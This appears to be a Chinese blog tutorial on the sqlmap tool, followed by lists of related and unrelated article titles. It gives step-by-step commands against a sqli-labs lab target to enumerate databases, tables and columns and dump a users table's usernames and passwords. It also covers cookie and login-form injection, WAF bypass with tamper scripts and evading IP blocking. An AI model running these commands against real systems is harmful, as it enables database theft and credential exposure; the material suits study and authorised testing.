sqlmap的用户手册:

sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中:

sqlmap主要用于sql注入方面的异常检测

Mysql数据库

1、先检测是否可以注入,先判断是否可以正常注入:

sqlmap -u  url  -v 3

里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题

对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测

2、爆库

sqlmap.py -u http://sqli-labs-master/Less-1/?id=1 -v 3 --dbs --batch

3、根据爆出来的库查表

sqlmap.py -u http://sqli-labs-master/Less-1/?id=1 -v 3 -D "security" --tables --batch

4、根据表查字段

sqlmap.py -u http://sqli-labs-master/Less-1/?id=1 -v 3 -D "security" -T "users" --columns --batch

5、根据字段查值

sqlmap.py -u http://sqli-labs-master/Less-1/?id=1 -v 3 -D "security" -T "users" -C "username,password" --dump --batch

防止被IP拦截的操作,random-agent让请求头随机:

可以在后面增加--proxy http://127.0.0.1:8080 --random-agent -v 3

通常等级2就够用了:

cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2

POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables
                sqlmap.py -u 登录的地址 --forms 自动判断注入
                sqlmap.py -u 登录的地址 --data "指定参数"

绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs  --batch --tamper

有兴趣的同学,可以查下参数的含义

Access

对于Access数据库,直接报表就OK

sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --tables

sqlmap里面的字典位置,内置字典位置为,可以根据自己的需要更改,对于Access一般就是直接暴库

sqlmap\data\txt

此文章只是个引子,希望对大家有帮助!

sqlmap工具基本使用(检测sql注入)相关推荐

  1. Sqlmap速查表/功能移植/Python批量检测SQL注入

    title: Sqlmap速查表与Python进行功能移植 copyright: true top: 0 date: 2021-02-27 11:59:00 tags: [扫描注入,注入,sqlmap ...

  2. 通过Burp以及自定义的Sqlmap Tamper进行二次SQL注入

    原文链接:https://yq.aliyun.com/articles/214915 本文讲的是通过Burp以及自定义的Sqlmap Tamper进行二次SQL注入, 其中一种安全漏洞被叫做二次注入, ...

  3. mysql监测攻击_如何检测SQL注入技术以及跨站脚本攻击

    展开全部 在最近两年中,安全专家应该对网络应用层的攻击更加重e69da5e887aa62616964757a686964616f31333339666164视.因为无论你有多强壮的防火墙规则设置或者非 ...

  4. 【转载】用Snort巧妙检测SQL注入和跨站脚本攻击

    脚本攻击是最近网络上最疯狂的攻击方法了,很多服务器配置了先进的硬件防火墙.多层次的安全体系,可惜最后对80端口的SQL注入和跨站脚本攻击还是没有办法抵御,只能看着数据被恶意入侵者改的面目全非而毫无办法 ...

  5. KALI LINUX2021环境下使用sqlmap进行DVWA中的sql注入(安全等级LOW)

    KALI LINUX2021环境下使用sqlmap进行DVWA中的sql注入(安全等级LOW) 渗透环境 第一步:将DVWA中安全等级调整为LOW (使用谷歌Chrome浏览器) 第二步:利用网页对s ...

  6. sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程

    Sqlmap工具 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令) sql注 ...

  7. 使用sqlmap检测sql注入漏洞

    一. sql注入概述并安装sqlmap漏洞查看工具 1. sql注入概述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命 ...

  8. sqlmap检测sql注入漏洞

    sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限.它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数 ...

  9. mysql sql注入工具_基础篇——SQL注入(工具注入)

    注入工具 上一篇介绍了SQL注入漏洞以及一些手工注入方法,本篇介绍一下注入工具 1.sqlmap sqlmap属于比较经典的一个注入工具,功能强大,还自带一些绕过参数 使用方法: sqlmap.py ...

最新文章

  1. Microbiome:根系分泌物驱动土壤记忆抵御植物病原菌(作者解读)
  2. 剑指offer刷题(java)|二维数组中的查找|替换空格|leetcode刷题
  3. c语言printf里的自增,笔试题记录:C语言——函数printf()的执行机制;先自增与后自增的区别;取值运算与自增运算的优先级...
  4. scala初学之helloWorld
  5. matlab由直方图分度,MATLAB复习资料
  6. BZOJ1195[HNOI2006]最短母串——AC自动机+BFS+状态压缩
  7. 美国国土安全部发布针对高风险铁路基础设施的强制性安全要求
  8. JavaScript错误信息
  9. 深入浅出MyBatis:MyBatis解析和运行原理
  10. Oracle的分析函数over()
  11. 播放器的html代码怎么写,制作HTML播放器代码及方法
  12. DayDayUp:计算机技术与软件专业技术资格证书之《系统集成项目管理工程师》课程讲解之十大知识领域之4辅助—项目沟通管理
  13. 空间后方交会编程c语言,单像空间后方交会(python实现)
  14. 小虾米闯江湖服务器维护中,小虾米闯江湖数据总结及中期注意事项一览
  15. MySQL 千万级数据处理
  16. 什么是VOLTE(2)
  17. 绕不开的TCP之三次握手
  18. 网页播放视频怎么更改播放倍速
  19. 多元分析(Multivariate Analysis)
  20. Hyper-V虚拟机/WSL/WSA镜像压缩

热门文章

  1. 中船嘉年华(上海)邮轮有限公司正式宣布落户上海宝山区;“乐高(R)奇妙花园探秘之旅”于宋庆龄文化空间启程 | 全球旅报...
  2. 我是江西人 (二)江右商帮
  3. 鸿蒙最新功能及承载设备详解:HarmonyOS 2及华为全场景新品发布会全纪录
  4. 在网站上更改鼠标样式
  5. 营销型网站的概念及设计制作过程中的注意事项
  6. html封面设计图片手绘大全,本子封面设计手绘素描图片欣赏
  7. AB测试——流程介绍(实施实验和结果分析)
  8. Jetson Nano - 自己动手搭建Jetbot环境
  9. 数据分析初回-探索性数据分析
  10. Oracle修改内存大小